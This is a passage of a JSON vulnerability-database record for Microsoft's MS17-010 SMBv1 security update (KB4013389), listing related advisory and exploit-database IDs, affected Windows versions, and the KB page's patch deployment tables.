"THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4012598"], "type": "mskb"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], 
"type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-09-11T12:33:22", "value": 6.5, "vector": "NONE"}}, "hash": "e311164474c6687c491096ccffc30dca15864b3dcf95d35b812da6fc9752276a", "history": [], "href": "https://support.microsoft.com/en-us/help/4013389/", "id": "KB4013389", "immutableFields": [], "kb": "KB4013389", "lastseen": "2019-09-11T12:33:22", "modified": "2017-03-14T17:40:20", "mscve": "", "msfamily": "", "msimpact": "Remote Code Execution", "msplatform": "", "msproducts": ["14135", "13230", "14478", "14562", "14113", "13228", "11721", "14210", "15514", "17381", "11728", "19589", "11740", "15511", "16735", "11733", "17508", "11719", "14492", "16710", "17651", "17654", "16730", "19759", "13236", "14496", "14490", "14139", "13233", "14501", "14440", "17360", "18472", "19756", "14136", "16625", "13234", "19754", "17657", "14503", "17344", "18875", "14131", "17542", "11708"], "msrc": "MS17-010", "msseverity": "Critical", "objectVersion": "1.5", "parentseeds": [], "primarySupportAreaPath": [{"id": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "name": "Windows Server 2016", "parent": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "tree": [], "type": "productname"}, {"id": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "name": "Windows Servers", "tree": [], "type": "productfamily"}, {"id": "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "name": "Windows Server 
2016 Datacenter", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}], "published": "2017-03-11T21:22:44", "references": [], "reporter": "Microsoft", "superseeds": ["KB2508429", "KB896422", "KB923414", "KB971468", "KB982214", "KB3073921", "KB917159", "KB2536275", "KB957095", "KB3177186", "KB958687", "KB975517"], "supportAreaPathNodes": [{"id": "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "name": "Windows Server 2008 Datacenter", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "name": "Windows 8.1 Pro", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "dc52833c-eac7-25b7-b942-b2dfcfbace09", "name": "Windows Server 2012 R2 Essentials", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "96bdd47e-5cb0-fbd3-9808-6c4bead5f000", "name": "Windows Server 2008 R2 Datacenter", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "12db0355-c78b-b1b8-0c13-671906e0652d", "name": "Windows Server 2016 Essentials", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}, {"id": "f62ed778-6986-d76e-c007-40a28315ffbf", "name": "Windows Server 2008 Enterprise", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "6a967721-27d9-bd5f-9029-99ca5f0436dd", "name": "Windows Server 2012 R2 Foundation", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": 
"2b2eeb95-d89c-6614-0db5-88f09133ede6", "name": "Windows Server 2008 Foundation", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "name": "Windows 7 Home Basic", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "name": "Windows 7 Ultimate", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "e2b2a040-324c-43bf-447c-75aab15e2570", "name": "Windows Server 2012 Foundation", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "name": "Windows Server 2008 for Itanium-Based Systems", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "28a9ef75-2920-9f59-4d6c-4e6d6c99cf4c", "name": "Windows Server 2012 R2 Datacenter", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "1b3bc777-c681-e378-d422-eb618baa26f9", "name": "Windows Server 2012 Essentials", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "670009af-2bc1-fa29-d4a5-99c02e923013", "name": "Windows Server 2008 R2 Standard", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "289fe55d-04e8-fd33-f9f3-f7ad74c153bf", "name": "Windows Server 2012 R2 Standard", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "8540b382-5304-d506-ece2-a936dd11d66e", "name": "Windows 10, version 1511", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "b2012b15-7770-3165-b934-5b004ee86f67", "name": "Windows 8.1", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "9b513fa9-12cb-5183-ab1b-0d5c70317be8", "name": "Windows Server 2016 
Standard", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}, {"id": "ceefced2-0d6f-a4bd-50d6-875c871b8250", "name": "Windows Server 2012 Datacenter", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "4af945c2-8a39-6b82-777b-5067ce2c9216", "name": "Windows Server 2012 Standard", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "name": "Windows 7 Enterprise", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "86630540-cb68-b324-567b-e197838cd28b", "name": "Windows RT 8.1", "parent": "13d0da43-f4d6-9f8e-d090-ed3881084c6e", "tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "928d79ba-72eb-762f-39be-122173e95922", "name": "Windows Vista Starter", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "b5011041-7904-59f1-97ca-53b1da5812fb", "name": "Windows 7 Starter", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "c6cab6e3-6598-6a1f-fbb2-f66d3740139d", "name": "Windows 10", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "2994eca6-696c-b523-20de-40b02211bb3b", "name": "Windows Server 2008 R2 Enterprise", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": 
"6f18bf60-d0f1-8298-413b-89f6e8170528", "name": "Windows 7 Professional", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "333f3bd9-9578-fda0-5919-4b8fa39524c3", "name": "Windows Server 2008 Standard", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "32719e08-ef7b-a697-0697-ec02d753dbb5", "name": "Windows Server 2008 R2 Web Edition", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "d21af3d6-5cde-c325-4483-c1810c7a5bdd", "name": "Windows Server 2008 R2 Foundation", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "e51103b3-9b99-948e-95ff-fd63b48f329b", "name": "Windows 10, version 1607", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "417baa75-0c45-df0a-8e65-960580d94f42", "name": "Windows Server 2008 R2 Service Pack 1", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "name": "Windows 7 Home Premium", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "name": "Windows 8.1 Enterprise", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "name": "Windows Server 2008 Web Edition", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "9087adda-9d1d-0ba1-1b0b-ad434f940308", "name": "Windows 7 Service Pack 
1", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "name": "Windows Server 2016 Datacenter", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "b2012b15-7770-3165-b934-5b004ee86f67", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "e51103b3-9b99-948e-95ff-fd63b48f329b", "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "289fe55d-04e8-fd33-f9f3-f7ad74c153bf", "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "28a9ef75-2920-9f59-4d6c-4e6d6c99cf4c", "6f18bf60-d0f1-8298-413b-89f6e8170528", "670009af-2bc1-fa29-d4a5-99c02e923013", "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "32719e08-ef7b-a697-0697-ec02d753dbb5", "e2b2a040-324c-43bf-447c-75aab15e2570", "d21af3d6-5cde-c325-4483-c1810c7a5bdd", "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "1b3bc777-c681-e378-d422-eb618baa26f9", "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "333f3bd9-9578-fda0-5919-4b8fa39524c3", "b5011041-7904-59f1-97ca-53b1da5812fb", "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "8540b382-5304-d506-ece2-a936dd11d66e", "f62ed778-6986-d76e-c007-40a28315ffbf", "86630540-cb68-b324-567b-e197838cd28b", "928d79ba-72eb-762f-39be-122173e95922", "12db0355-c78b-b1b8-0c13-671906e0652d", "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "fd3a2888-0af1-3691-5303-bc85b4302e62", "c6cab6e3-6598-6a1f-fbb2-f66d3740139d", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "9b513fa9-12cb-5183-ab1b-0d5c70317be8", "ceefced2-0d6f-a4bd-50d6-875c871b8250", "9087adda-9d1d-0ba1-1b0b-ad434f940308", "96bdd47e-5cb0-fbd3-9808-6c4bead5f000", "4af945c2-8a39-6b82-777b-5067ce2c9216", "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "2994eca6-696c-b523-20de-40b02211bb3b", "417baa75-0c45-df0a-8e65-960580d94f42", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", 
"dc52833c-eac7-25b7-b942-b2dfcfbace09", "2b2eeb95-d89c-6614-0db5-88f09133ede6", "6a967721-27d9-bd5f-9029-99ca5f0436dd"], "title": "MS17-010: Security update for Windows SMB Server: March 14, 2017", "type": "mskb", "viewCount": 33}, "differentElements": ["supportAreaPathNodes"], "edition": 1, "lastseen": "2019-09-11T12:33:22"}, {"bulletin": {"bulletinFamily": "microsoft", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. 
</li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/><div>The following articles contain more information about this security update as it relates to individual product versions. These articles may contain known issue information. </div><br/><br/><ul id=\"info1_list1\"><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012598\" managed-link=\"\" target=\"\"> 4012598</a> MS17-010: Description of the security update for Windows SMB Server: March 14, 2017</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012216\" managed-link=\"\" target=\"\"> 4012216</a> March 2017 Security Monthly Quality Rollup for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012213\" managed-link=\"\" target=\"\"> 4012213</a> March 2017 Security Only Quality Update for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012217\" managed-link=\"\" target=\"\"> 4012217</a> March 2017 Security Monthly Quality Rollup for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012214\" managed-link=\"\" target=\"\"> 4012214</a> March 2017 Security Only Quality Update for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" 
href=\"http://support.microsoft.com/kb/4012215\" managed-link=\"\" target=\"\"> 4012215</a> March 2017 Security Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012212\" managed-link=\"\" target=\"\"> 4012212</a> March 2017 Security Only Quality Update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013429\" managed-link=\"\" target=\"\"> 4013429</a> March 13, 2017\u2014KB4013429 (OS Build 933)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012606\" managed-link=\"\" target=\"\"> 4012606</a> March 14, 2017\u2014KB4012606 (OS Build 17312)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013198\" managed-link=\"\" target=\"\"> 4013198</a> March 14, 2017\u2014KB4013198 (OS Build 830)</li></ul></div><h2>Security update deployment</h2><span><h3><strong>Windows Vista (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p>\u00a0</p><h3><strong>Windows Server 2008 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported Itanium-based editions of Windows Server 2008<br/><strong>Windows6.0-KB4012598-ia64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. 
</p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 7 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>Windows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a><span><u> </u></span></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall </strong>setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. 
</p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2008 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. 
</p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. 
